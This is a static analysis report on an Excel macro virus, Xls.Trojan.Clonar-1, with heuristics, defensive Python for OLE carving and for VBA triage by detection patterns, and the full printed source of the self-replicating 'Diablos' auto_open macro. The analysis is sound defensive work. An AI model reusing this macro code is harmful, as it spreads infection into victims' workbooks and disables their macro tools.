Xls.Trojan.Clonar-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 1e35525ded6b34de…

MALICIOUS

Office (OLE)

42.5 KB · Created: 1999-02-08 09:24:15 · Authoring application: Microsoft Excel · First seen: 2012-06-14
MD5: 55afdc848e4d90e6e318dfef65fd6f20 SHA-1: 2dd7b8c26e252925d95436eaed60e70957077767 SHA-256: 1e35525ded6b34de2f1713239b6b0a7624a7fee43314a20d02938049c99e7368
300 Risk Score

Malware Insights

Xls.Trojan.Clonar-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

This Excel workbook carries an auto_open VBA macro in a module named 'Diablos', so the code runs as soon as the file is opened with macros enabled; the ClamAV signature 'Xls.Trojan.Clonar-1' matches the extracted source (artifact macros.bas below). The macro is a self-replicating macro virus of the late-1990s type, not a downloader: it suppresses alerts, disables the Macro and Visual Basic command bars, exports its own module to C:\Windows\Diablos.bas, and imports that module into every other open workbook after removing any existing 'Diablos' component (the comment 'Clonar Codigo Diablos' translates as 'clone Diablos code', which the family name Clonar echoes). The extracted source contains no network, download or shell-execution code; the only visible payload is switching on large toolbar buttons on the 30th of each month. Replication through VBProject requires programmatic access to the VBA project object model, which modern Office versions deny by default unless 'Trust access to the VBA project object model' is enabled, so the infection routine fails with a runtime error on a default configuration. The three embedded-OLE heuristics below (EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE, OLE_SLACK_ANOMALY, OLE_PARSE_EMPTY_STREAMS) all describe one carved region that starts at offset 0x60A8 (24,744) and runs to the end of the 43,520-byte file (24,744 + 18,776) while exposing no directory streams; weigh them as a single unparseable-tail finding rather than as three independent indicators of a second exploit document.

Heuristics 6

  • ClamAV: Xls.Trojan.Clonar-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Clonar-1
  • Embedded Office document has suspicious static findings critical EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE
    A CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    The carved OLE body is 18,776 bytes but its declared streams total 0 bytes, so all 18,776 bytes (100%) fall outside any allocated stream. Unallocated sector slack is a known hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached through a parser pointer-corruption bug in the document structure). Here, however, the 0-byte stream total is a direct consequence of the unreadable directory reported by OLE_PARSE_EMPTY_STREAMS, so the 100% figure measures a parse failure rather than a confirmed hidden payload.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • CFB header with no readable streams medium OLE_PARSE_EMPTY_STREAMS
    The file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous — it is seen with truncated/corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.
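The EMPTY_STREAMS and SLACK findings above both come down to one question: does the CFB header's first directory sector actually lie inside the bytes that were carved? The following Python is an added illustration of that check, not the scanner's own code. It carves every CFB signature out of a buffer, validates the header fields that matter (byte-order mark, sector shift), and tests whether the directory is reachable; it also reproduces the offset arithmetic for this sample (0x60A8 + 18,776 == 43,520, the whole 42.5 KB file). The input buffer and the header builder are constructed fixtures, and the function names are mine.

```python
"""Carve CFB/OLE2 headers from a byte buffer and test whether each one's directory
is reachable. Added example for the OLE_PARSE_EMPTY_STREAMS / OLE_SLACK_ANOMALY
triage; not the analysis platform's code."""
import struct

CFB_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
ENDOFCHAIN = 0xFFFFFFFE


def make_cfb_header(sector_shift=9, first_dir_sector=0):
    """Constructed 512-byte CFB v3 header, used only as a test fixture."""
    hdr = bytearray(512)
    hdr[0:8] = CFB_MAGIC
    struct.pack_into("<HH", hdr, 0x18, 0x003E, 0x0003)        # minor / major version
    struct.pack_into("<HHH", hdr, 0x1C, 0xFFFE, sector_shift, 6)  # BOM, sector shift, mini shift
    struct.pack_into("<II", hdr, 0x2C, 1, first_dir_sector)    # FAT sector count, first dir sector
    struct.pack_into("<I", hdr, 0x38, 0x1000)                  # mini stream cutoff
    struct.pack_into("<III", hdr, 0x3C, ENDOFCHAIN, 0, ENDOFCHAIN)  # mini FAT start/count, DIFAT start
    struct.pack_into("<I", hdr, 0x4C, 0)                       # DIFAT[0]: FAT in sector 0
    for i in range(1, 109):
        struct.pack_into("<I", hdr, 0x4C + 4 * i, 0xFFFFFFFF)  # unused DIFAT slots
    return bytes(hdr)


def carve_cfb_headers(buf):
    """One record per CFB signature in buf. A header can be structurally valid while its
    directory sector lies past the end of the carved region: that is the 'valid header,
    no readable streams' condition the heuristic flags."""
    hits = []
    pos = buf.find(CFB_MAGIC)
    while pos != -1:
        remaining = len(buf) - pos
        rec = {"offset": pos, "carved_size": remaining,
               "valid_header": False, "dir_reachable": False}
        if remaining >= 512:
            bom, shift = struct.unpack_from("<HH", buf, pos + 0x1C)
            (first_dir,) = struct.unpack_from("<I", buf, pos + 0x30)
            rec["valid_header"] = bom == 0xFFFE and shift in (9, 12)
            if rec["valid_header"] and first_dir < 0xFFFFFFFA:
                # Sector n starts at (n + 1) * sector_size; the header occupies sector -1.
                dir_off = (first_dir + 1) << shift
                rec["dir_reachable"] = dir_off + 128 <= remaining  # room for one 128-byte entry
        hits.append(rec)
        pos = buf.find(CFB_MAGIC, pos + 1)
    return hits


def runs_to_eof(child_offset, child_size, file_size):
    """True when a carved child ends exactly at the end of the host file, i.e. the carver
    took everything from the signature onward. For this sample: 0x60A8 + 18776 == 43520."""
    return child_offset + child_size == file_size


# Constructed fixture: filler, a header whose directory sits at sector 0 (reachable),
# more filler, then a header claiming its directory at sector 5000 (far past the data).
SAMPLE = (b"\x00" * 256 + make_cfb_header(first_dir_sector=0) + b"\x00" * 1024
          + b"X" * 200 + make_cfb_header(first_dir_sector=5000) + b"\x00" * 600)

if __name__ == "__main__":
    for h in carve_cfb_headers(SAMPLE):
        print(h)
    print("child runs to EOF:", runs_to_eof(0x60A8, 18776, 43520))
```

When the second kind of hit shows up in a real file, the next step is to check whether the host application still resolves the object (for example by opening the carved bytes with olefile and with the authoring application in a sandbox) before treating the region as a deliberately shifted payload.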

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename · Kind · Source · Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2978 bytes
SHA-256: eab0d60a590e10ef0091610b1b5657f576248a95e93c507b87f65da47f531e97
Detection
ClamAV: Xls.Trojan.Clonar-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Diablos"
' Diablos Macro
' Bios Virus Macro - (C) Copyright 1998 - Spalaci

Sub auto_open()
Attribute auto_open.VB_Description = "Macro grabada el 5/07/98 por Epson"
Attribute auto_open.VB_ProcData.VB_Invoke_Func = "D\n14"

' Disable Menssages
  Application.DisplayAlerts = False

' Disable Tools + Keys
  Set Bar1 = CommandBars("Macro")
  Bar1.Enabled = False
  Set Bar2 = CommandBars("Visual Basic")
  Bar2.Enabled = False
    
' Clonar Codigo Diablos
  ThisWorkbook.VBProject.VBComponents("Diablos").Export ("C:\Windows\Diablos.bas")
    
' Clean + Infeccion
  For Each I In Workbooks
      If I.Name <> ThisWorkbook.Name Then
         For Each J In I.VBProject.VBComponents
             If J.Name = "Diablos" Then
                I.VBProject.VBComponents.Remove I.VBProject.VBComponents("Diablos")
             End If
         Next J
         I.VBProject.VBComponents.Import ("C:\Windows\Diablos.bas")
      End If
  Next I

' Label
  If Day(Date) = 30 Then
     CommandBars.LargeButtons = True
  End If
  
' Enable Messages
  Application.DisplayAlerts = True
  
End Sub
embedded_office_off000060a8.ole embedded-office Embedded OLE/CFB Office body inside ole container at offset 0x60A8 18776 bytes
SHA-256: e5fef41f8d67b80e6d57c6eaa487fa52b4e4231b9bc57c7394ac9d85e82453c4
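The extracted macro above is a textbook macro virus: an auto-exec entry point, UI tampering, and replication through the VBProject object model rather than any download. As an added example (not part of this report or of the analysis platform), the following Python scans VBA source for exactly those behaviours and separates a self-replicating virus from a downloader by the presence or absence of network and shell primitives. The source string is a constructed excerpt of the Diablos module shown in macros.bas, trimmed to the relevant statements; the rule names and the verdict strings are mine.

```python
"""Static triage of extracted VBA source: auto-exec entry points, VBProject self-replication,
UI tampering and download/execute indicators. Added example, not the report's own tooling."""
import re

# Constructed excerpt of the 'Diablos' module from macros.bas above (comments and the
# date-triggered LargeButtons toggle dropped; statements otherwise as extracted).
DIABLOS_SRC = r'''
Attribute VB_Name = "Diablos"
Sub auto_open()
  Application.DisplayAlerts = False
  Set Bar1 = CommandBars("Macro")
  Bar1.Enabled = False
  Set Bar2 = CommandBars("Visual Basic")
  Bar2.Enabled = False
  ThisWorkbook.VBProject.VBComponents("Diablos").Export ("C:\Windows\Diablos.bas")
  For Each I In Workbooks
      If I.Name <> ThisWorkbook.Name Then
         For Each J In I.VBProject.VBComponents
             If J.Name = "Diablos" Then
                I.VBProject.VBComponents.Remove I.VBProject.VBComponents("Diablos")
             End If
         Next J
         I.VBProject.VBComponents.Import ("C:\Windows\Diablos.bas")
      End If
  Next I
  Application.DisplayAlerts = True
End Sub
'''

# Procedure names Office runs without user interaction.
AUTOEXEC_RE = re.compile(
    r'^\s*(?:Public\s+|Private\s+)?Sub\s+'
    r'(auto_open|auto_close|autoopen|autoclose|autoexec|workbook_open|document_open)\s*\(',
    re.IGNORECASE | re.MULTILINE)

# Behaviour rules (name, pattern). Per-rule counts are returned so the analyst sees how
# many times each capability appears, not just whether it does.
RULES = [
    ("vbproject_export", re.compile(r'\.VBProject\.VBComponents\([^)]*\)\.Export\b', re.I)),
    ("vbproject_import", re.compile(r'\.VBProject\.VBComponents\.Import\b', re.I)),
    ("vbproject_remove", re.compile(r'\.VBProject\.VBComponents\.Remove\b', re.I)),
    ("alerts_suppressed", re.compile(r'Application\.DisplayAlerts\s*=\s*False', re.I)),
    ("macro_ui_disabled", re.compile(r'CommandBars\("(?:Macro|Visual Basic)"\)', re.I)),
    # Typical downloader/dropper primitives; their absence separates a virus from a loader.
    ("download_exec", re.compile(
        r'URLDownloadToFile|XMLHTTP|WinHttp|WScript\.Shell|\bShell\s*\(|powershell|cmd\.exe', re.I)),
]
WIN_PATH_RE = re.compile(r'"([A-Za-z]:\\[^"]+)"')


def triage_vba(src):
    findings = {"autoexec": [m.group(1).lower() for m in AUTOEXEC_RE.finditer(src)]}
    for name, rx in RULES:
        findings[name] = len(rx.findall(src))
    findings["paths"] = sorted(set(WIN_PATH_RE.findall(src)))
    # Self-replication needs both halves: the module exports itself to disk and imports the
    # saved copy into other workbooks. Either half alone is ordinary developer tooling.
    findings["self_replicating"] = bool(findings["vbproject_export"] and findings["vbproject_import"])
    return findings


def classify(findings):
    if findings["self_replicating"] and not findings["download_exec"]:
        return "self-replicating macro virus"
    if findings["download_exec"]:
        return "downloader/dropper"
    return "macro present, no replication or download behaviour matched"


if __name__ == "__main__":
    result = triage_vba(DIABLOS_SRC)
    for key, value in result.items():
        print(f"{key:20} {value}")
    print("verdict:", classify(result))
```

Run against the full macros.bas dump (for example the output of `olevba --decode`) the same rules apply unchanged; the Attribute header blocks for ThisWorkbook and Sheet1 to Sheet6 match nothing, which is the expected result for stock module stubs.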